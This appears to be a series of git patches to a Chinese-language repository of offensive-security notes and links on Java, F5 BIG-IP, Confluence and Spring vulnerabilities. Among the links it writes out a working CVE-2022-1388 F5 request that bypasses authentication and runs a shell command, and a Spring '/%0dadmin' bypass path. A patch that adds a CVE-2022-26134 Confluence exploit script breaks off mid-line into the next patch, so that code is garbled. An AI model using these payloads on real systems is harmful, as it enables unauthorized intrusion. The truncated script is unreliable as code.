-------------------------------- - -2022/1/20更新 - -项目200star啦~~~~~~~~ +如果你遇到了很好的文章非常欢迎提交issues. ## Stargazers over time From e5e22f3e6e62e063c561366979009f7f968b928c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 3 May 2022 14:56:36 +0800 Subject: [PATCH 046/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7e6da48..2138a2b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -122,3 +122,4 @@ + 2022/04/20 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **比较牛皮了** + 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** + 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) ++ 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** From cf9b74f751e4ed1834640d660cbff6a76373210b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 3 May 2022 15:15:24 +0800 Subject: [PATCH 047/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2138a2b..b5460ad 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -123,3 +123,4 @@ + 2022/04/30 [Hessian2黑名单](https://github.dev/sofastack/sofa-hessian/blob/master/src/main/resources/security/serialize.blacklist) **通过已有的黑名单快速挖掘利用的危险类** + 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) + 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** ++ 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** From 65919c894f60b4029ecb3ce30a0e8765c4ba988d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 May 2022 15:51:25 +0800 Subject: [PATCH 048/332] Create Readme.md --- F5 big/Readme.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 F5 big/Readme.md diff --git a/F5 big/Readme.md b/F5 big/Readme.md new file mode 100644 index 0000000..21d29e5 --- /dev/null +++ b/F5 big/Readme.md @@ -0,0 +1,14 @@ +# F5 big + +F5 Networks K52145254:TMUI RCE 漏洞 CVE-2020-5902 ++ [HSQLDB反序列化](https://buaq.net/go-84779.html) + + +F5 BIGIP iControl REST CVE-2021-22986 ++ [脚本小子是如何复现漏洞(CVE-2021-22986)并实现批量利用](https://mp.weixin.qq.com/s/cavKq04hNU5pJoTBiPMZkw) ++ [F5 BIGIP iControl REST CVE-2021-22986漏洞分析与利用](https://www.anquanke.com/post/id/236159) ++ [F5 BIG-IP Cookie 信息泄露利用工具](https://mp.weixin.qq.com/s/RzYSA1ADrIQYQxqjug62sg) ++ [漏洞复现-F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)](https://mp.weixin.qq.com/s/CDST3_FcVM8tvB0hTlrsJg) + + + From f7f519c04fddcb71f5d245d34cf0334e235df8a4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 May 2022 21:21:10 +0800 Subject: [PATCH 049/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 4 ++++ 1 file changed, 4 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index b44acd1..4859d8a 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -16,6 +16,10 @@ ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) ++ [JavaWeb 内存马二周目通关攻略](https://tttang.com/archive/1313) + +## jsp ++ [](https://xz.aliyun.com/t/10372) ## 查杀 + [查杀Java web filter型内存马](https://gv7.me/articles/2020/kill-java-web-filter-memshell/) From 0d5b6e66b3b1e3ec05041ce387455555fab5ee73 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 7 May 2022 23:12:09 +0800 Subject: [PATCH 050/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5460ad..041e464 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -124,3 +124,4 @@ + 2022/05/02 [不同的类加载器加载的类不是同一个类](https://blog.csdn.net/csdnlijingran/article/details/89226943) + 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** + 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** ++ 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** From 5eb78252a69eeb099d36119c2db51a8cfde29ee0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 20:16:06 +0800 Subject: [PATCH 051/332] Update Readme.md --- F5 big/Readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 21d29e5..a9a455d 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -10,5 +10,5 @@ F5 BIGIP iControl REST CVE-2021-22986 + [F5 BIG-IP Cookie 信息泄露利用工具](https://mp.weixin.qq.com/s/RzYSA1ADrIQYQxqjug62sg) + [漏洞复现-F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)](https://mp.weixin.qq.com/s/CDST3_FcVM8tvB0hTlrsJg) - - +CVE-2022-1388 ++ [BIG-IP(CVE-2022-1388)从修复方案分析出exp](https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q) From d23d9811d90b6de1afc144ea3475ddf72d7f87a6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 20:16:35 +0800 Subject: [PATCH 052/332] Update Readme.md --- F5 big/Readme.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index a9a455d..5c528d3 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -12,3 +12,15 @@ F5 BIGIP iControl REST CVE-2021-22986 CVE-2022-1388 + [BIG-IP(CVE-2022-1388)从修复方案分析出exp](https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q) +``` +POST /mgmt/tm/util/bash HTTP/1.1 +Host: +Connection: keep-alive, X-F5-Auth-Token +Authorization: Basic YWRtaW46 +Content-Length: 45 + +{ +"command":"run", +"utilCmdArgs":"-c id" +} +``` From 010f623a3eb1aaf5bf1cf63f0e8539d211a9e77b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 20:17:24 +0800 Subject: [PATCH 053/332] Update Readme.md --- F5 big/Readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 5c528d3..28fbf8d 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -16,7 +16,7 @@ CVE-2022-1388 POST /mgmt/tm/util/bash HTTP/1.1 Host: Connection: keep-alive, X-F5-Auth-Token -Authorization: Basic YWRtaW46 +Authorization: Basic YWRtaW46QVNhc1M= Content-Length: 45 { From 92235a922a1209ec354a5ca45bdb6fc6b68a85b1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 May 2022 23:11:49 +0800 Subject: [PATCH 054/332] Update Readme.md --- F5 big/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 28fbf8d..5550bdd 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -24,3 +24,4 @@ Content-Length: 45 "utilCmdArgs":"-c id" } ``` ++ [CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现](https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw) From 4fdc736ef98eac0af86dc569a1da7e4518348844 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:44:29 +0800 Subject: [PATCH 055/332] Create Readme.md --- .../Velocity/Readme.md" | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" new file mode 100644 index 0000000..c77b206 --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -0,0 +1,5 @@ +# 真实例子 + +Confluence CVE-2019-3396 + +Confluence CVE-2021-26084 From 75ceceb52b876ef68c44078d01a7862171a3483c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:47:17 +0800 Subject: [PATCH 056/332] Create Readme.md --- Confluence/Readme.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 Confluence/Readme.md diff --git a/Confluence/Readme.md b/Confluence/Readme.md new file mode 100644 index 0000000..87dcd80 --- /dev/null +++ b/Confluence/Readme.md @@ -0,0 +1,8 @@ +# Confluence + +目前存在2个漏洞CVE-2019-3396,CVE-2021-26084 +项目中遇到了这个漏洞,并没有深入分析和利用。 +参考exp + ++ [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) ++ [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence) From 1d77a594482b1b409032e0029593c96160ae1565 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:52:43 +0800 Subject: [PATCH 057/332] Update Readme.md --- Confluence/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Confluence/Readme.md b/Confluence/Readme.md index 87dcd80..70a6a80 100644 --- a/Confluence/Readme.md +++ b/Confluence/Readme.md @@ -6,3 +6,6 @@ + [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) + [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence) + +## 漏洞分析 ++ [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736) From 08099ae46c7e6710a49037b96c08b7323d1cf772 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 May 2022 10:54:44 +0800 Subject: [PATCH 058/332] Update Readme.md --- .../Velocity/Readme.md" | 1 - 1 file changed, 1 deletion(-) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index c77b206..3a3feb9 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -2,4 +2,3 @@ Confluence CVE-2019-3396 -Confluence CVE-2021-26084 From 5c0d1081e7538e33fee10f655973d7c10071bcdc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 14 May 2022 19:55:27 +0800 Subject: [PATCH 059/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 041e464..e062887 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -125,3 +125,4 @@ + 2022/05/03 [使用 CVE-2020-2555 攻击 Shiro](https://xz.aliyun.com/t/9343) **可能之后自己会遇到。** + 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** + 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** ++ 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** From 88a90f1c3c30a915feb869b178c02718b062a060 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 May 2022 00:34:11 +0800 Subject: [PATCH 060/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e062887..6bbdd03 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -126,3 +126,4 @@ + 2022/05/03 [快速探测目标防火墙出网端口的工具化实现](https://xz.aliyun.com/t/10677) **小工具感觉有时候不错** + 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** + 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** ++ 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** From 6e3c8e51080dae1402b3e0a181e829aa52a8e128 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 May 2022 00:49:06 +0800 Subject: [PATCH 061/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6bbdd03..dc7fbed 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -127,3 +127,4 @@ + 2022/05/07 [红蓝必备 你需要了解的weblogic攻击手法](https://mp.weixin.qq.com/s/tgQO9ILHudfkkOzeahICTg) **检测路径非常不错** + 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** + 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** ++ 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) From f613568b3637ea88856b5bf0158c81bc8cdb46ba Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 May 2022 20:28:11 +0800 Subject: [PATCH 062/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dc7fbed..373d202 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -128,3 +128,4 @@ + 2022/05/14 [入侵检测挑战赛第二期-XXE注入wp](https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247487049&idx=1&sn=fba13912ae3c490b588c6fb0231055c4&chksm=977432a8a003bbbec5421ba14f9fe5480972f9c8ef2ad7f9dea4df4be7d987de5552157a29f3&mpshare=1&scene=23&srcid=0514JguMX8NCJBwchxH7ZZMG&sharer_sharetime=1652501963417&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **分块传输** + 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** + 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) ++ 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) From 46f6a935e3fb2481d01640da69c6a0b7cdbdb309 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 May 2022 21:52:58 +0800 Subject: [PATCH 063/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 373d202..1b8b565 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -129,3 +129,4 @@ + 2022/05/16 [红队第9篇:给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s?__biz=MzU0MjUxNjgyOQ==&mid=2247489836&idx=1&sn=ac9f3ea11dcae5f9a819bdad6c2b0440&chksm=fb182a1ecc6fa308837e69c8420996a1dc5b8b0ecd6dc4fec91b88facd65fc13a0b7da5022d6&mpshare=1&scene=23&srcid=0516lp7Qgg05Zcrb9rdmPY6g&sharer_sharetime=1652630865336&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己真实遇到的问题** + 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) + 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) ++ 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** From e2d9166cd71d9b936d2ed713e5f9cf2484ccc5d5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 20 May 2022 01:18:39 +0800 Subject: [PATCH 064/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1b8b565..48c1f4f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -130,3 +130,4 @@ + 2022/05/16 [DNS记录类型介绍(A记录、MX记录、NS记录等)](https://developer.aliyun.com/article/331012) + 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) + 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** ++ 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** From 9b885e384157176d80ba8982492dc6f0c8767e29 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 21 May 2022 20:54:28 +0800 Subject: [PATCH 065/332] Update Readme.md --- Spring/Readme.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Spring/Readme.md b/Spring/Readme.md index 0129415..d48eb5c 100644 --- a/Spring/Readme.md +++ b/Spring/Readme.md @@ -11,3 +11,12 @@ ``` /%0dadmin ``` + ++ [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过漏洞与利用场景分析](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490023&idx=1&sn=f7e654f69ceca1ff437d9431bdd8ffa7&chksm=cefda0f3f98a29e5556a31b28ba231613e49b0ff40fcee651fac351adc6376e2ad2b72509dbf&mpshare=1&scene=23&srcid=0521LQrB49HRCgrnaPZOD2ys&sharer_sharetime=1653110684149&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + +原理就是默认情况下, 正则表达式中点(.)不会匹配换行符, 设置了Pattern.DOTALL模式, 才会匹配所有字符包括换行符。从而绕过 + +![image](https://user-images.githubusercontent.com/63966847/169652431-125a8ebd-251d-4fec-a8dd-be20a3c60da5.png) + + +小知识:[Java中正则表达式(regex)匹配多行(Pattern.MULTILINE和Pattern.DOTALL模式)](https://www.cjavapy.com/article/68/) From a54440dcb43b3c1620634fd69a9e0e092e748160 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 30 May 2022 11:59:45 +0800 Subject: [PATCH 066/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 48c1f4f..4ccb632 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -131,3 +131,4 @@ + 2022/05/17 [socks5 代理和 http 代理有什么区别](https://www.wangan.com/wenda/2272) + 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** + 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** ++ 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** From a51b68438269f121c7fb2eaf7a63c3c457dbdbf2 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 4 Jun 2022 16:11:22 +0800 Subject: [PATCH 067/332] Update Readme.md --- Confluence/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Confluence/Readme.md b/Confluence/Readme.md index 70a6a80..b3e5090 100644 --- a/Confluence/Readme.md +++ b/Confluence/Readme.md @@ -6,6 +6,7 @@ + [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) + [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence) ++ [CVE-2022-26134](https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/) ## 漏洞分析 + [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736) From 8faadaf33c411f12fb539e8dd113f0fb7efbe079 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 4 Jun 2022 16:12:18 +0800 Subject: [PATCH 068/332] Create CVE-2022-26134.py --- Confluence/CVE-2022-26134.py | 114 +++++++++++++++++++++++++++++++++++ 1 file changed, 114 insertions(+) create mode 100644 Confluence/CVE-2022-26134.py diff --git a/Confluence/CVE-2022-26134.py b/Confluence/CVE-2022-26134.py new file mode 100644 index 0000000..4b3ee09 --- /dev/null +++ b/Confluence/CVE-2022-26134.py @@ -0,0 +1,114 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import re +import requests +import urllib3 + +# https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 +result = [] # 结果 + + +# 添加 +endpoints = [ +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + # 'http': '127.0.0.1:8080' +} + + +def check_target_version(host, socket_proxies): + try: + response = requests.get("{}/login.action".format(host),headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if response.status_code == 200: + filter_version = re.findall(".*", response.text) + if (len(filter_version) >= 1): + version = filter_version[0].split("'>")[1].split(' Date: Sun, 5 Jun 2022 21:14:27 +0800 Subject: [PATCH 069/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4ccb632..5f745e5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -132,3 +132,4 @@ + 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** + 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** ++ 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** From 8fbf0f68495238bb0a92fa91bc6be3ba3f0e7b50 Mon Sep 17 00:00:00 2001 From: Firebasky 